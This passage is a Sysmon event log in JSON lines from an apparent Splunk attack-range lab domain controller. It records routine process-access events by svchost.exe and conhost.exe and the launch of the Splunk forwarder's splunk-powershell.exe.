C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:41.925","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5960,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:41.925\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:41.925","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5961,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:41.925\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:41.925","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5962,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:41.925\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:41.925","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5963,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:41.925\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:41.925","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5964,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:41.925\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:41.925","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5965,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:41.925\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:41.925","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5966,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:41.925\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20ED-5F25-0000-001077460900}\r\nTargetProcessId: 2232\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:41.925","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20ED-5F25-0000-001077460900}","TargetProcessId":"2232","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5967,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:43.348\r\nProcessGuid: {41C8662E-20EF-5F25-0000-001076480900}\r\nProcessId: 4384\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:43.348","ProcessGuid":"{41C8662E-20EF-5F25-0000-001076480900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT 